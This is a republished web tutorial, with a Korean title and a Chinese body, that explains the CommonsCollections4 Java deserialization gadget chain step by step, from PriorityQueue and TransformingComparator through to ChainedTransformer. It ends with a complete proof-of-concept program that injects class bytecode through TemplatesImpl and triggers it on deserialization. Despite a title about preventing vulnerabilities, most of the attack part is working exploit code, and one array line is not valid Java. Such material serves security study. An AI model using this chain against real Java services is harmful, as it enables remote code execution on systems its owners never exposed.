> Java > java지도 시간 > 취약점을 방지하기 위해 Java 보안에서 CommonsCollections4를 구현하는 방법은 무엇입니까?

취약점을 방지하기 위해 Java 보안에서 CommonsCollections4를 구현하는 방법은 무엇입니까?

WBOY
풀어 주다: 2023-04-20 17:16:08
앞으로
1553명이 탐색했습니다.

    引子

    CC4简单来说就是CC3前半部分和CC2后半部分拼接组成的,对于其利用的限制条件与CC2一致,一样需要在commons-collections-4.0版本使用,原因是TransformingComparator类在3.1-3.2.1版本中还没有实现Serializable接口,无法被反序列化。

    PriorityQueue

    PriorityQueue是一个优先队列,作用是用来排序,重点在于每次排序都要触发传入的比较器comparator的compare()方法 在CC2中,此类用于调用PriorityQueue重写的readObject来作为触发入口

    PriorityQueue中的readObject间接调用了compare() 而compare()最终调用了transform()

    readobject()方法

    private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        // Read in size, and any hidden stuff
        s.defaultReadObject();
        // Read in (and discard) array length
        s.readInt();
        queue = new Object[size];
        // Read in all elements.
        for (int i = 0; i < size; i++)
            queue[i] = s.readObject();
        // Elements are guaranteed to be in "proper order", but the
        // spec has never explained what that might be.
        heapify();
    }
    로그인 후 복사

    重写了该方法并在最后调用了heapify()方法,我们跟进一下:

    private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }
    로그인 후 복사
    로그인 후 복사

    这里的话需要长度等于2才能进入for循环,我们要怎样改变长度呢。

    这里用到的是该类的add方法,将指定的元素插入此优先级队列。

    heapify()调用了siftdown()方法

    继续跟进:

    private void siftDown(int k, E x) {
        if (comparator != null)
            siftDownUsingComparator(k, x);
        else
            siftDownComparable(k, x);
    }
    로그인 후 복사

    可以看到判断条件

     if (comparator != null)
    로그인 후 복사

    调用了

    siftDownUsingComparator(k, x);
    로그인 후 복사

    在siftDownUsingComparator()又调用了 comparator.compare()。

    TransformingComparator

    可以看到该类在CC3的版本中不能反序列化,在CC4的版本中便可以了。

    TransformingComparator是一个修饰器,和CC1中的ChainedTransformer类似。

    TransformingComparator里面存在compare方法,当我们调用时就会调用传入transformer对象的transform方法具体实现是this.transformer在传入ChainedTransformer后,会调用ChainedTransformer#transform反射链。

    问题

    1.就像刚才heapify里面所说的

    private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }
    로그인 후 복사
    로그인 후 복사

    我们要进入循环要修改值,通过add方法。

    priorityQueue.add(1);
    priorityQueue.add(2);
    로그인 후 복사

    2.initialCapacity的值要大于1

    3.comparator != null

    4.通过反射来修改值防止在反序列化前调用,就如之前的链一样,我们到利用时再用反射修改参数。

    类似这个样子:

    Class c=transformingComparator.getClass();
            Field transformField=c.getDeclaredField("transformer");
            transformField.setAccessible(true);
            transformField.set(transformingComparator,chainedTransformer);
    로그인 후 복사

    我们先放置个反序列化前不会执行这条链的随便一个参数:

    TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
    로그인 후 복사

    POC

    package ysoserial;
    import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
    import javassist.convert.TransformWriteField;
    import org.apache.commons.collections4.Transformer;
    import org.apache.commons.collections4.comparators.TransformingComparator;
    import org.apache.commons.collections4.functors.ChainedTransformer;
    import org.apache.commons.collections4.functors.ConstantTransformer;
    import org.apache.commons.collections4.functors.InstantiateTransformer;
    import org.apache.commons.collections4.functors.InvokerTransformer;
    import org.apache.commons.collections4.map.LazyMap;
    import org.apache.xalan.xsltc.trax.TrAXFilter;
    import javax.xml.crypto.dsig.Transform;
    import javax.xml.transform.Templates;
    import java.io.*;
    import java.lang.reflect.*;
    import java.nio.file.Files;
    import java.nio.file.Paths;
    import java.util.HashMap;
    import java.util.Map;
    import java.util.PriorityQueue;
    public class cc4 {
        public static void main(String[] args) throws Exception {
            TemplatesImpl templates=new TemplatesImpl();
            Class tc=templates.getClass();
            Field nameField=tc.getDeclaredField("_name");
            nameField.setAccessible(true);
            nameField.set(templates,"XINO");
            Field bytecodesField=tc.getDeclaredField("_bytecodes");
            bytecodesField.setAccessible(true);
            byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));
            byte[][] codes=[code];
            bytecodesField.set(templates,codes);
            Field tfactoryField=tc.getDeclaredField("_tfactory");
            tfactoryField.setAccessible(true);
            tfactoryField.set(templates,new TransformerFactoryImpl());
            InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
            //
            Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
            };
            ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
            TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
            PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
            priorityQueue.add(1);
            priorityQueue.add(2);
            Class c=transformingComparator.getClass();
            Field transformField=c.getDeclaredField("transformer");
            transformField.setAccessible(true);
            transformField.set(transformingComparator,chainedTransformer);
            serialize(priorityQueue);
            unserialize("ser.bin");
        }
        public static void serialize(Object obj) throws Exception{
            ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));
            oss.writeObject(obj);
        }
        public static void unserialize(Object obj) throws Exception{
            ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));
            oss.readObject();
        }
    }
    로그인 후 복사

    위 내용은 취약점을 방지하기 위해 Java 보안에서 CommonsCollections4를 구현하는 방법은 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

    관련 라벨:
    원천:yisu.com
    본 웹사이트의 성명
    본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
    인기 튜토리얼
    더>
    최신 다운로드
    더>
    웹 효과
    웹사이트 소스 코드
    웹사이트 자료
    프론트엔드 템플릿